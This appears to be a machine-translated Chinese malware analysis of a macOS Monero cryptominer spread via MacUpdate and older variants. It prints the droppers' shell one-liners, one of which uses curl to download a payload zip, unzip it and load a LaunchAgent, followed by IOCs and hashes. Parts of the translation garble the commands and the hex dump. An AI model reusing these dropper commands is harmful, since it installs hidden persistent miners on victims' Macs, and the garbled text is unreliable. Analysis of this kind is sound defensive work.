2月1日,发现了一个新的MAC Cryptominer通过MacUpdate网站的黑客攻击发布. 从那时起,我们进行了一些挖掘,发现这起孤立事件只是冰山一角。MacUpdate黑客提供的恶意软件似乎是至少从去年10月初开始出现的事情的高潮。

正如我们通常在调查新恶意软件时所做的那样,我们通过网站VirusTotal(一个庞大的众包恶意软件存储库)进行了一些搜索,看看是否可以找到任何其他变体。这些被称为“追溯搜索”的搜索并不经常出现,但在本例中,我们发现了黄金,发现了不少于23个这种恶意软件的旧变种!

最古老的是名为“niceass.zip”的文件(漂亮的名字)。解压缩文件导致包含两个文件的文件夹:一个名为“ass.jpg”的图像文件和名为“temp”的明显破损的应用程序。

正如Finder所指出的,“temp”应用程序根本不起作用,经过检查,它甚至没有作为macOS应用程序的正确内部结构。

然而,内容仍然很有趣。他们是:

  • 一张“ass.jpg”图片(你最好不要看到)
  • 一个名为“com.zerowidth. launcher .apple.”的文件。这是一个启动代理。Plist文件
  • 一个名为“Dock”的可执行文件(与管理Dock的Apple进程同名)
  • 一个框架文件夹,其中包含Dock可执行文件必须需要的一些外部框架代码

很明显,这不是一个应用程序,但有些恶作剧是计划好的。

那么位于temp.app包之外的第一个ass.jpg文件呢?我打赌大家都不会感到惊讶,它实际上不是一个JPEG文件。相反,它是一个shell脚本。

nohup mv~/Downloads/niceass/temp.app~/Downloads/niceass/.tmp/Apple~/Library&&mkdir-p~/Library/LaunchAgents&&mv~/Library/Apple/com.zerowidth.launched.Apple.plist~/Library/LaunchAgents&&launchctl load-w~/Library/launchaunchagents/com.zerowidth.Apple.plist&&rm~/rf~/nichaunchauss/.tmp&&rm~/Downloads/niceass/ass.jpg&&mv~/Library/Apple/ass.jpg~/Downloads/niceass&&open-a预览~/Downloads/niceass/ass.jpg&~/Library/Apple/Dock-usersarahmayergo1990@gmail.com@gmail.com-xmr&killall终端

正如我们所看到的,这个脚本假设它将从niceass文件夹中运行,而niceass文件夹又必须位于Downloads文件夹中。如果是在其他地方,或者你删除了坏掉的temp.app,恶意软件就会完全失败。

第一步是将temp.app重命名为“.tmp”,这会由于名称中的初始句点而将其隐藏在视图中。(我不知道为什么它一开始没有用这个名字分发,这就不会那么可疑了。)接下来,它将各种组件从niceass文件夹中移出,并移动到所需的位置。已安装并加载launch agent.plist文件。

接下来,脚本进行了一些清理,并将Apple文件夹中的ass.jpg文件替换为ass.jpg文件。然后在预览中打开该文件(哎呀,我的眼睛!),以掩盖打开的不仅仅是一个图像文件的事实。

最后,恶意的Dock进程启动,传入一个看似错误的电子邮件地址作为登录Minergate的用户名。Dock将尽可能多地占用CPU时间来挖掘Monero加密货币。当你的MacBook Pro的粉丝们试图推动它飞起来的时候,抓紧了!

有趣的是ass.jpg是如何运行的。我们已经介绍了恶意软件在过去使用的一些技巧,这些技巧可以使shell脚本看起来像另一种类型的文件,例如在末尾添加空格,以防止扩展名实际上被视为扩展名,或者在扩展名中使用特殊的非ASCII相似字符。不过,在本例中,这是一个诚实的.jpg扩展。

实际上有一个简单的方法来覆盖这个扩展。使用获取信息窗口(File ->在Finder中获取信息),您可以更改用于打开特定文件的应用程序。

这样做会将此设置保存在与文件相关联的特殊元数据中。如果使用Mac将文件压缩成zip文件,则元数据将保存在一些添加到zip文件的特殊文件中,并在解压时在另一个Mac上重新构建。可以使用“xattr -l”命令从命令行查看此元数据。

$ xattr -l /users/thomas/desktop/link-to -download.txt com.apple.launchservices.openwith:00000000 62 70 6c 69 73 74 30 30 d3 01 02 03 04 05 06 57 | BP1STR00 ...........00000010 76 65 72 73 69 65 62 54 70 61 74 68 5F 10 10 62 | VersionTPath _ .. B |00000020 75 6e 64 6c 65 69 64 65 6e 74 69 66 69 65 72 10 | undle identier。|00000030 00 5F 10 24 2F 41 70 70 6C 69 63 61 74 69 6F 6E | ._。$ /申请|00000040 73 2F 55 74 69 6C 69 74 69 65 73 2F 54 65 72 6D | S /实用/术语|00000050 69 62 61 6C 2E 61 70 70 50 5F 10 12 63 6F 6D 2E 61 | INAL.APP _ .. COM.A |00000060 70 70 6C 65 2E 54 65 72 6D 69 64 62 62 62 61 6C 08 0F 17 | PLE.TERMINAL ... |00000070 1C 2F 31 58 00 00 00 00 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00。/ 1x ............ |00000080 00 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |00000090 00 00 00 00 6D | ... M |

总之,这不是一个高度复杂的恶意软件。有许多失败点和会引起怀疑的事情,这些都可以轻易避免。但是,嘿,这只是最早的变体。我们还有22个人要看!

事实证明,没有任何其他的好变种更复杂。按照时间顺序,下一个变体叫做“serial.zip”,它的工作原理类似,除了可疑的temp.app被重命名为.temp。应用程序,将其从用户视图中隐藏。它用包含某种序列号的文本文件替换了令人讨厌的照片。否则,它几乎是相同的,甚至是相同的损坏电子邮件地址传递给矿工。

接下来是一个很长的文件声称是从WhatsApp获取的JPEG,名称“Whatsapp Image 2017-12-23在13.31.15.jpeg whatsapp映像2017-12-23。这些没有依赖Temp.App,而是按照我们使用Macupdate Variants所看到的,并从www.askideas.com从www.askideas.com抓住诱饵形象,从public.adobecc.com下载有效载荷。

nohup rm-rf~/Downloads/WhatsApp\Image\2017-12-23\at\13.31.15.jpeg和&curl-o~/Downloads/WhatsApp\Image\2017-12-23\at\13.31.15.jpeghttps://www.askideas.com/media/38/I-Killed-Black-Snake-Why-U-Not-Happy-Funny-Pet-Meme-Image-For-Whatsapp.jpg &&打开-预览~/Downloads/WhatsApp\Image\2017-12-23\at\13.31.15.jpeg&&curl-o~/Library/1.ziphttps://public.adobecc.com/files/1UFRTMCE4GD4DBFSPQVFGD2FYYVFFF?content_disposition=attachment &&cd~/Library&&unzip~/Library/1.zip&&rm-rf~/Library/1.zip&&mkdir-p~/Library/LaunchAgents&&mv~/Library/GoogleSoftwareUpdateAgent.plist~/Library/LaunchAgents&&launchctl load-w~/Library/LaunchAgents/GoogleSoftwareUpdateAgent.plist&killall终端

此变体还使用MacOSupdate.plist和MacOS.plist启动代理,如恶意软件的MacUpdate变体所示。这些WhatsApp变体的日期介于12月23日和1月26日之间(根据文件元数据而不是文件名判断)。

最后一个版本的日期是12月26日,是一个名为link-to-download.txt的单一文件,它与WhatsApp和一系列/nice版本都有相似之处。

有趣的是,这些文件都是使用两个不同的苹果开发者证书进行加密签名的。这些证书颁发给了名叫Ramos Jaxson和Tiago Mateus的人。(Jaxson先生还负责MacUpdate最新版本的签名。)

SentinelOne的Arnaud Abbati首先报道了一个有趣的发展,最近的MacUpdate变体中隐藏的.DS_存储元数据文件显示Mateus先生的全名是Tiago Brandao Mateus。

这是一个漂亮的特定名称,但它仍有待观察到这是他的真名,还是它是一个诱饵。由于这种恶意软件并不是很复杂,因此有一些漂亮的愚蠢错误,我的怀疑是创建它的黑客不知道.ds_store文件存在,那么它将捕获他正在使用的用户名计算机。

希望当局能够追查到Mateus先生和suss,查出他可能参与了这个恶意软件的创建。

IOC.

丢弃的文件

~ /图书馆/ LaunchAgents / com.zerowidth.launched.apple。plist ~ /图书馆/ LaunchAgents / GoogleSoftwareUpdateAgent。plist ~ /图书馆/ LaunchAgents / MacOS。plist ~ /图书馆/ LaunchAgents / MacOSupdate。plist ~ /图书馆/苹果/码头~ /图书馆/ mdworker / mdworker

哈希

3ec55908c3357b92a58f877440d110a970d4ce4cc76a8ac1a7281abec71c717f d58dd1f057da70a28a67ef48fe4c3942f99ffa082dd7d79c139db7f86e8ac63c b30ef172e01a31c687e311334677241c2b338844a6bc92bfe06bb5f359281dfa 47667ab1c5950b77ed50a7e629dd916db7505bcb9abff6e21dd7edaa280cc043 6b8d88f08569c4ff778647bede9dbb329dad628474422f86cec2ba0c3084072a a6f454b71a4d4f1c9767197f5459363f77fb205ef274a189e4e0aefa825b19f9 ac8f29c762e27d5c6ccb73c016cd05f79123bcf5420e9f7547839243c39d6a4c dd3731d421901f17f213ffd0a38596e12f413d43100be9754879247f51c75397 f23ec1d8de76824838b2ac2782ac97819f94c3a5695e2be83357f5a6e0d12d8c 2527ff0b11fd312c7aa7fc39f19c08298f2a0e17c171f96f83e8a32c4979c878 3dc8fdfb09f38f6ca1ae0360660a9b71e3be58b1ea72655fa07fcc0ed8633e29 eff259d20b01d96b6ae9c05106e6462f5e0dd8ae6dc548f5b9d87444b45988d0 cfa7a04e4958acf89baa0dd2ce2a8b9618fd500f7ed6fffd4cf7703c9bbde188 28219506e683f4324815bcfb4fb9115abfdc611ad49f00d1382ff005f8b10103 cc058cc8821ed92e0c8385a36b4aae589e7383a05eba764195f311c046a519fd 592ba3b270c5f46c2912e64d855f2ff918af4b9708845b5239b83e949d670ba9 a1cdbd2a03bb84f001034ecaed52e45147213e487b2b83df94da42893a2b725f 783ffb8b21e8df463c8f024d4e085aae345ee5784db62c7209f07f30a0fda399 e59c8db1a48b08d03e0c64b9259c11154e267662d5d1183b8dc6837afc33006a 17ff20345c9579ee1f5f51cb5c36806e238536b18db112a99a15b9e0ff190acf 1fc064e7d6624d1539469dc038709fffb7aabc6b484446d7d9dd87507680155f 83f40501e7f27b2b3aa0590b63985b9af99e05dd71f333b2b2d430bd9b4335df f75b21f758b698822518eee358c8b57e9f5421d691d5a9d6fbe395a974c57c3e